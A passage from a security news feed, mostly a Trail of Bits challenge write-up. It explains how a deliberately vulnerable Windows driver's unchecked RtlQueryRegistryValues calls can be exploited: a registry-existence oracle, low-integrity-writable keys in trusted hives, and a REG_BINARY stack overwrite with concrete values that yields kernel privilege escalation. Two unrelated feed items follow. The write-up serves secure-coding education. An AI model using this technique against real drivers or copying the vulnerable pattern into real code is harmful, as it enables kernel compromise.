</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Major version is %d"</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">readValue</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">=</span> <span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// versions prior to 3.0 need an additional check
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MinorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">NT_SUCCESS</span><span class="p">(</span><span class="n">status</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_ERROR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Failed to query registry. Status: %d"</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">status</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">status</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">TraceEvents</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_LEVEL_INFORMATION</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">TRACE_QUEUE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="s">"%!FUNC! Minor version is %d"</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">readValue</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">version</span><span class="p">.</span><span class="n">Minor</span> <span class="o">=</span> <span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">DoesVersionSupportNewCallback</span><span class="p">(</span><span class="n">version</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">handlerCallback</span> <span class="o">=</span> <span class="n">OldCallback</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="nf">SetGlobalHandlerCallback</span><span class="p">(</span><span class="n">handlerCallback</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre>
</figure>
<p>The intended behavior of the code is to read some software version information from the registry using the <code>RtlQueryRegistryValues</code> API, then select one of two possible callback functions depending on that version information.</p>
<h3>An attacker-controlled registry path</h3>
<p>The first bug is that the path to the registry key is provided in the request, without validating the path string or checking that the caller is authorized to access the specified registry key. This means that anyone who can call into this handler can pick which registry key gets read, even if they ordinarily wouldn’t have access to that key. How this path string is interpreted depends on the <code>RelativeTo</code> parameter of the <code>RtlQueryRegistryValues</code> call. In this case, <code>RelativeTo</code> is set to <code>RTL_REGISTRY_ABSOLUTE</code>, which means that the path will be treated as an absolute path to a registry key object (e.g., <code>\Registry\User\CurrentUser</code>). There are two main reasons why this is a potential security issue.</p>
<p>First, if an attacker can control which registry key is being read, then they can point it at a registry key they control the contents of, allowing them to further manipulate the driver behavior. This may lead to logical inconsistencies (e.g., the wrong callback being set) or, as we will see shortly, enable exploitation of security issues elsewhere in the code.</p>
<p>Second, this enables a confused deputy attack that can be used to leak registry information that would normally be inaccessible to the user due to access controls. For example, a registry key might have a DACL applied that prevents normal users from enumerating its subkeys or reading any of the values inside those keys. Since the handler doesn’t check whether the call has sufficient rights to read the key, and the code emits a trace message and passes back the status code from <code>RtlQueryRegistryValues</code>, it can be used as an oracle to check for the existence of any registry key. It can also be used to leak any registry value named <code>MajorVersion</code> (and sometimes also <code>MinorVersion</code>) anywhere in the registry, but this is unlikely to be particularly useful in practice.</p>
<h3>Missing type checks with RTL_QUERY_REGISTRY_DIRECT</h3>
<p>The more serious bugs in this case arise from the flags set in the <code>RTL_QUERY_REGISTRY_TABLE</code> structs. The <code>RtlQueryRegistryValues</code> API takes in an array of these structs, terminated by an all-zero entry, to describe which registry values should be read from the specified key and how they should be processed and returned. There are two primary modes of operation here: callback or direct. In callback mode, which is the default, the <code>QueryRoutine</code> field of the struct points to a callback function that receives the value read from the registry. In direct mode, the <code>QueryRoutine</code> field is ignored and the value is instead written directly to a buffer whose location is passed in the <code>EntryContext</code> field. Direct mode is selected by including <code>RTL_QUERY_REGISTRY_DIRECT</code> in the <code>Flags</code> field.</p>
<p>In our example, the <code>MajorVersion</code> value is read using the following code:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">HandlerCallback</span> <span class="n">handlerCallback</span> <span class="o">=</span> <span class="n">NewCallback</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">readValue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// read the major version from the registry
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="n">RTL_QUERY_REGISTRY_TABLE</span> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MajorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span></span></span></code></pre>
</figure>
<p>Here, <code>RTL_QUERY_REGISTRY_DIRECT</code> is used to select direct mode, and the buffer points to <code>readValue</code>, which is an integer variable on the stack. You might notice something important, though: at no point has the code specified what type of value is being read, nor has it specified the size of the buffer. It is clear from the context that this code is expecting to read a <code>REG_DWORD</code>, but what if the <code>MajorVersion</code> value isn’t a <code>REG_DWORD</code>?</p>
<h3>A first attempt at exploitation</h3>
<p>Let’s try to exploit this using a <code>REG_QWORD</code>. A <code>REG_DWORD</code> value is a 32-bit unsigned integer, whereas a <code>REG_QWORD</code> is a 64-bit unsigned integer, so if we make <code>MajorVersion</code> a <code>REG_QWORD</code> value instead, then we should be able to overwrite four bytes immediately after <code>readValue</code> on the stack. Since <code>HKEY_CURRENT_USER</code> is writable by low-privilege users, we can create a key somewhere in there, place a <code>REG_QWORD</code> value called <code>MajorVersion</code> in there, and pass the path of that key to the driver. And success, we get a BSOD!</p>
<p>Except… it’s not quite what we wanted. The bugcheck code is <code>KERNEL_SECURITY_CHECK_FAILURE</code>, which isn’t really what we would expect if we successfully overwrote some of the stack. Why is this happening? The answer is in the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-rtlqueryregistryvalues">documentation</a>:</p>
<blockquote>
<p>Starting with Windows 8, if an <code>RtlQueryRegistryValues</code> call accesses an untrusted hive, and the caller sets the <code>RTL_QUERY_REGISTRY_DIRECT</code> flag for this call, the caller must additionally set the <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag. A violation of this rule by a call from user mode causes an exception. A violation of this rule by a call from kernel mode causes a 0x139 bug check (<code>KERNEL_SECURITY_CHECK_FAILURE</code>).</p>
<p>Only system hives are trusted. An <code>RtlQueryRegistryValues</code> call that accesses a system hive does not cause an exception or a bug check if the <code>RTL_QUERY_REGISTRY_DIRECT</code> flag is set and the <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag is not set. However, as a best practice, the <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag should always be set if the <code>RTL_QUERY_REGISTRY_DIRECT</code> flag is set.</p>
<p>Similarly, in versions of Windows before Windows 8, as a best practice, an <code>RtlQueryRegistryValues</code> call that sets the <code>RTL_QUERY_REGISTRY_DIRECT</code> flag should additionally set the <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag. However, failure to follow this recommendation does not cause an exception or a bug check.
This protective behavior was introduced as a response to <a href="https://learn.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-011">MS11-011</a>, in which this registry type confusion bug was first reported.</p>
</blockquote>
<p>To summarize, if you try to read from an untrusted registry hive using <code>RtlQueryRegistryValues</code> with <code>RTL_QUERY_REGISTRY_DIRECT</code> set but without also setting <code>RTL_QUERY_REGISTRY_TYPECHECK</code>, then Windows will automatically raise a bugcheck to crash the system and prevent the operation from succeeding.</p>
<p>The <code>RTL_QUERY_REGISTRY_TYPECHECK</code> flag allows the caller to specify an expected type as part of the query table entry, thus mitigating the type confusion bug. Since this flag is not set in our example, a bugcheck will be triggered if we attempt to read from any registry hive other than the following trusted system hives:</p>
<ul>
<li><code>\REGISTRY\MACHINE\HARDWARE</code></li>
<li><code>\REGISTRY\MACHINE\SOFTWARE</code></li>
<li><code>\REGISTRY\MACHINE\SYSTEM</code></li>
<li><code>\REGISTRY\MACHINE\SECURITY</code></li>
<li><code>\REGISTRY\MACHINE\SAM</code></li>
</ul>
<p><code>HKEY_CURRENT_USER</code> is not included within this set, which explains why we saw the <code>KERNEL_SECURITY_CHECK_FAILURE</code> bugcheck when we tried to exploit it that way. This downgrades us from a potential kernel privilege escalation bug to a local denial of service. Still a bug, but not quite as exciting.</p>
<h3>Finding writable keys in trusted hives</h3>
<p>However, who says we can’t write values somewhere within these trusted hives? All it takes is a single key within one of those hives with a DACL that allows a lower-privileged user to write to it. Finding these isn’t too hard; the <a href="https://www.powershellgallery.com/packages/NtObjectManager/">NtObjectManager powershell module</a> has a command named <code>Get-AccessibleKey</code> that is perfect for the task:</p>
<p><code>Get-AccessibleKey \Registry\Machine -Recurse -Access SetValue</code></p>
<p>This command searches recursively within the <code>\Registry\Machine</code> object namespace for keys that the current process has permissions to set values within. Running it as a regular desktop user returns thousands of options that can be written without UAC elevation! Nice.</p>
<p>However, for style points, we can go one step further. <a href="https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control">Mandatory integrity control (MIC)</a>, one of the key access control features in Windows that underpins UAC, allows processes to run with higher or lower privileges than would normally be assigned to the user that ran them. Most desktop processes run at the medium integrity level (IL). Elevating a process via UAC (often referred to as “run as administrator”) typically increases the process’s IL to high. There is also a low IL, which is often used to sandbox certain processes for security reasons, significantly limiting which resources they can access. Any securable object on Windows can have a mandatory label applied to its system access control list (SACL), and that mandatory label specifies the ILs that are allowed to access the object. The SACL is checked before the DACL, meaning that the IL check must pass even if the DACL would normally grant the user permissions to access the object. This means that a process running with a low-integrity security token cannot access a medium-integrity object, and a process running with a medium-integrity security token cannot access a high-integrity object. So, can we find any cases where we could write to one of the trusted system hives from a low-integrity process?</p>
<p>To check for keys that are accessible at a low IL, the first thing we want to do is duplicate our process token and apply a low integrity label to it:</p>
<p><code>$token = Get-NtToken -Primary -Duplicate -IntegrityLevel Low</code></p>
<p>This gives us a copy of our current process’s security token that behaves as if we were running at a low IL. Using this, we then rerun the scan, passing in that modified token:</p>
<p><code>Get-AccessibleKey \Registry\Machine -Recurse -Access SetValue -Token $token</code></p>
<p>This does actually return a few results, on both Windows 10 and 11. Here are two of the most interesting:</p>
<p><code>\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM</code>
<code>\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PlayReady\Troubleshooter</code></p>
<p>Both of these keys allow a low-integrity token to write to them. The <code>DRM</code> key’s DACL has fairly complex permissions applied but grants the Set Value permission to the Everyone group. The <code>PlayReady\Troubleshooter</code> key’s DACL grants Full Control to Users, ALL APPLICATION PACKAGES, and ALL RESTRICTED APP PACKAGES. Either of these two keys can be abused to plant controlled registry values within a trusted system hive from a low privilege level.</p>
<p>(Note: Whether or not the driver’s request endpoint can be called from a low IL is a different matter, but this is just for fun and style points, so let’s ignore that for now.)</p>
<p>If we set a <code>REG_QWORD</code> value called <code>MajorVersion</code> in the <code>DRM</code> key, then pass that key’s path to the WDF handler, we can now overwrite four bytes of stack past the end of <code>readValue</code> with values that we control. Since <code>handlerCallback</code> was declared adjacent to <code>readValue</code>, there’s a chance that we can overwrite half of that function pointer! If that callback is called later, then we obtain partial control over the instruction pointer, which is a fairly strong primitive for local privilege escalation (LPE). This does depend on stack alignment, however, and it would not be surprising if the 32-bit <code>readValue</code> variable ended up 64-bit aligned, leaving a gap, so this approach may not get us far in practice.</p>
<p>Can we do better?</p>
<h3>A string is a type of integer, right?</h3>
<p>Ok, so far we’ve only explored what happens when we exploit the type confusion with <code>REG_QWORD</code>, but what happens if we use <code>REG_SZ</code>?</p>
<p>




 

 




 


 <img src="https://blog.trailofbits.com/2026/05/05/c/c-checklist-challenges-solved/cc-checklist-challenges-solved-image-1_hu_fe8665a0cbfe6e6b.webp" alt="“Samuel L. Jackson meme”" width="972" height="794" loading="lazy" decoding="async">
</p>
<p>In the case of <code>REG_SZ</code> (i.e., a string value), the documentation says the following about <code>RtlQueryRegistryValues</code>’ behavior in direct mode:</p>
<blockquote>
<p>A null-terminated Unicode string (such as <code>REG_SZ</code>, <code>REG_EXPAND_SZ</code>):
<code>EntryContext</code> must point to an initialized <code>UNICODE_STRING</code> structure. If the <code>Buffer</code> member of <code>UNICODE_STRING</code> is NULL, the routine allocates storage for the string data. Otherwise, it stores the string data in the buffer that <code>Buffer</code> points to.</p>
</blockquote>
<p>Let’s try exploiting this. <code>RtlQueryRegistryValues</code> will interpret the <code>EntryContext</code> field as if it were a <code>UNICODE_STRING</code> struct, but it’s actually pointing at <code>readValue</code>, which is an <code>int</code>. Here’s what a <code>UNICODE_STRING</code> looks like:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_UNICODE_STRING</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="n">USHORT</span> <span class="n">Length</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">USHORT</span> <span class="n">MaximumLength</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">PWSTR</span> <span class="n">Buffer</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">UNICODE_STRING</span><span class="p">,</span> <span class="o">*</span><span class="n">PUNICODE_STRING</span><span class="p">;</span></span></span></code></pre>
</figure>
<p>In the first call that the code makes to <code>RtlQueryRegistryValues</code>, when reading <code>MajorVersion</code>, the value of <code>readValue</code> has been initialized to zero. Since <code>readValue</code> is four bytes and a <code>USHORT</code> is two bytes, interpreting <code>readValue</code> as a <code>UNICODE_STRING</code> at that time will result in both <code>Length</code> and <code>MaximumLength</code> being zero and <code>Buffer</code> containing whatever’s immediately after <code>readValue</code> in the stack. Since the length of the buffer is zero, <code>RtlQueryRegistryValues</code> will just return <code>STATUS_BUFFER_TOO_SMALL</code> and not attempt to write to the <code>Buffer</code> field.</p>
<p>However, let’s take a look at the second call to <code>RtlQueryRegistryValues</code>:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">=</span> <span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">version</span><span class="p">.</span><span class="n">Major</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// versions prior to 3.0 need an additional check
</span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="nf">RtlZeroMemory</span><span class="p">(</span><span class="n">regQueryTable</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">RTL_QUERY_REGISTRY_TABLE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Name</span> <span class="o">=</span> <span class="sa">L</span><span class="s">"MinorVersion"</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">EntryContext</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">readValue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Flags</span> <span class="o">=</span> <span class="n">RTL_QUERY_REGISTRY_DIRECT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">QueryRoutine</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">status</span> <span class="o">=</span> <span class="nf">RtlQueryRegistryValues</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"> <span class="n">RTL_REGISTRY_ABSOLUTE</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regPath</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="n">regQueryTable</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"> <span class="nb">NULL</span>
</span></span><span class="line"><span class="cl"> <span class="p">);</span>
</span></span><span class="line"><span class="cl"> <span class="c1">// ...
</span></span></span></code></pre>
</figure>
<p>This part of the code first checks if the <code>MajorVersion</code> value is less than three and, if so, reads the <code>MinorVersion</code> value using the same approach as before. A key observation here is that <code>readValue</code> is not reinitialized between the calls. This gives us some extra control: by leaving <code>MajorVersion</code> as a <code>REG_DWORD</code>, as originally intended by the code, we can have the first <code>RtlQueryRegistryValues</code> call load a value into <code>readValue</code>. Then, when the second call to <code>RtlQueryRegistryValues</code> is made, to read <code>MinorVersion</code>, we control the first four bytes of data pointed to by <code>EntryContext</code>. If <code>MinorVersion</code> is a <code>REG_SZ</code> value, a type confusion occurs where <code>RtlQueryRegistryValues</code> expects <code>EntryContext</code> to point to a <code>UNICODE_STRING</code>, causing the contents of the <code>MajorVersion</code> integer to be reinterpreted as the <code>Length</code> and <code>MaximumLength</code> fields. The only restriction is that we need the major version check to pass (i.e., <code>version.Major</code> must be less than 3) in order for the second registry query to take place. However, this turns out to be easy: if we set the <code>MajorVersion</code> value to <code>0xF000F002</code>, the code will interpret this as <code>-268374014</code> because <code>readValue</code> is a signed 32-bit integer. The <code>Length</code> and <code>MaximumLength</code> fields, however, are unsigned 16-bit integers, causing the <code>0xF000F002</code> value to get interpreted as the following when type confused as a <code>UNICODE_STRING</code>:</p>
<figure class="highlight">
 <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">USHORT</span> <span class="n">Length</span> <span class="o">=</span> <span class="n">F000</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">USHORT</span> <span class="n">MaximumLength</span> <span class="o">=</span> <span class="n">F002</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"> <span class="n">PWSTR</span> <span class="n">Buffer</span> <span class="o">=</span> <span class="o">????????</span><span class="err">`</span><span class="o">????????</span><span class="p">;</span></span></span></code></pre>
</figure>
<p>The <code>Buffer</code> field ends up pointing at whatever’s next in the stack. If we combine this current approach with the <code>REG_QWORD</code> trick from before, we can also overwrite four bytes of the <code>Buffer</code> pointer during the <code>MajorVersion</code> read. This means we partially control the address being written to, we fully control the length of what is written, and we can write any UTF-16 string there. This gets us a semi-controlled write-what-where primitive in the kernel. Nice!</p>
<p>But can we do <em>even better</em>?</p>
<h3>A fully controlled stack overwrite with REG_BINARY</h3>
<p>Let’s take a look at what happens if we try a <code>REG_BINARY</code> value instead. Here’s what the documentation has to say about such values in direct mode:</p>
<blockquote>
<p>Nonstring data with size, in bytes, greater than <code>sizeof(ULONG)</code>:
The buffer pointed to by <code>EntryContext</code> must begin with a signed <code>LONG</code> value. The magnitude of the value must specify the size, in bytes, of the buffer. If the sign of the value is negative, <code>RtlQueryRegistryValues</code> will only store the data of the key value. Otherwise, it will use the first <code>ULONG</code> in the buffer to record the value length, in bytes, the second <code>ULONG</code> to record the value type, and the rest of the buffer to store the value data.</p>
</blockquote>
<p>This one is a bit more complicated, with two possible cases for the format of the buffer. In both cases, the buffer pointed to by <code>EntryContext</code> is expected to be prefilled with a signed <code>LONG</code> value that tells <code>RtlQueryRegistryValues</code> how large the buffer is. A <code>LONG</code> is just a 32-bit integer, so a signed <code>LONG</code> is functionally equivalent to <code>int</code> for this case. The interesting part is that this length value can either be positive or negative. If the value is negative, the API will copy the <code>REG_BINARY</code> data directly into the buffer pointed to by <code>EntryContext</code>. If the value is positive, it will first write the length of the <code>REG_BINARY</code> data into the first <code>ULONG</code> of the buffer, then it will write the <code>REG_BINARY</code> type value into the second <code>ULONG</code> of the buffer, and finally it will copy the <code>REG_BINARY</code> data into the remainder of the buffer.</p>
<p>You may have figured out the exploit already here. The <code>MinorVersion</code> registry value is only read when the <code>MajorVersion</code> is less than 3. If we set <code>MajorVersion</code> to some negative number, this check will pass. This negative number ends up left in <code>readValue</code> for the second <code>RtlQueryRegistryValues</code> call. If the <code>MinorVersion</code> value is a <code>REG_BINARY</code>, <code>RtlQueryRegistryValues</code> treats the first <code>ULONG</code> in the “buffer” as being the signed length field. Since our “buffer” is just whatever was in <code>readValue</code> from the previous call, this causes <code>RtlQueryRegistryValues</code> to copy the contents of the registry value into the “buffer,” which is really just stack memory starting at <code>readBytes</code>. Since we control the magnitude of the negative number, we therefore control the purported length of the buffer, allowing us to control the length of the overwrite. And, since the contents of the <code>REG_BINARY</code> value can be anything we like, it means we control what is overwritten.</p>
<p>For example, if we create a <code>REG_DWORD</code> value called <code>MajorVersion</code> with a value of <code>0xFFFFFFF4</code>, then create a <code>REG_BINARY</code> value called <code>MinorVersion</code> with a value of <code>00 00 00 00 DE AD BE EF DE AD BE EF</code>, this causes the first <code>RtlQueryRegistryValues</code> call to fill <code>readValue</code> with -12, which the second <code>RtlQueryRegistryValues</code> call interprets as a 12-byte buffer where only the binary should be copied. This results in <code>RtlQueryRegistryValues</code> copying <code>00 00 00 00</code> into <code>readValue</code>, then writing <code>DE AD BE EF DE AD BE EF</code> onto the stack afterwards. Assuming that the <code>handlerCallback</code> function pointer is stored after the <code>readValue</code> variable on the stack, we can now overwrite it with whatever we like. If this callback is invoked anywhere in the future, we gain control over the instruction pointer, leading to a kernel LPE.</p>
<p>But can we do <em>even better still</em>? If you think you can, get in touch! We’d love to hear your tips and tricks.</p>
<h2>Your turn</h2>
<p>These challenges only scratch the surface of what the <a href="https://appsec.guide/docs/languages/c-cpp/">C/C++ Testing Handbook chapter</a> covers—from seccomp sandbox escapes to Windows path traversal via WorstFit Unicode bugs. Read the chapter and follow the checklist against a codebase you know well. Pair it with a run of the <a href="https://github.com/trailofbits/skills/tree/main/plugins/c-review">c-review skill</a>, if you’re inclined. If you find a pattern we haven’t documented yet, open a PR. We’d especially love to hear from anyone who found a cleaner exploitation path for the driver challenge than the ones we showed here. And, as always, if you need help securing your C/C++ systems, <a href="https://www.trailofbits.com/contact/">contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exploring transactional filesystems]]></title>
<description><![CDATA[In order to implement router style semantics, Vyatta allows setting many different configuration variables and then applying them all at once with a commit command. Currently, this is implemented by a combination of shell magic and unionfs. The problem is that keeping unionfs up to date and fixin...]]></description>
<link>https://tsecurity.de/de/3501002/unix-server/exploring-transactional-filesystems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501002/unix-server/exploring-transactional-filesystems/</guid>
<pubDate>Fri, 08 May 2026 23:01:51 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In order to implement router style semantics, Vyatta allows setting many different configuration variables and then applying them all at once with a <span>commit</span> command. Currently, this is implemented by a combination of shell magic and <a href="http://www.filesystems.org/project-unionfs.html"><span>unionfs</span></a>. The problem is that keeping <span>unionfs</span> up to date and fixing the resulting crashes is major pain.<br><br>There must be better alternatives, current options include:<br><ul><li>Replace unionfs with <a href="http://aufs.sourceforge.net/">aufs</a> which has less users yelling at it and more developers.</li><li>Use a filesystem like <a href="http://btrfs.wiki.kernel.org/index.php/Main_Page">btrfs</a> which has snapshots. This changes the model and makes api's like "what changed?" hard to implement.</li><li>Move to a pure userspace model using <a href="http://git.or.cz/">git</a>. The problem here is that git as currently written is meant for users not transactions.<br></li><li>Use combination of copy, bind mount, and <a href="http://samba.anu.edu.au/rsync/">rsync</a>.</li><li>Use a database for configuration. This is easier for general queries but is the most work. Conversion from existing format would be a pain.<br></li></ul>Looks like a fun/hard problem. Don't expect any resolution soon.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Jato IRC logger]]></title>
<description><![CDATA[Here's the recipe for the Jato IRC logger. Nothing fancy, but works surprisingly well./home/vegard/jato-irc-logger/irssi-config:settings = {       core = {               real_name = "#jato IRC logger";               user_name = "vegard";               nick = "jato-irc-logger";       };       "fe-...]]></description>
<link>https://tsecurity.de/de/3500936/unix-server/the-jato-irc-logger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500936/unix-server/the-jato-irc-logger/</guid>
<pubDate>Fri, 08 May 2026 22:59:46 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
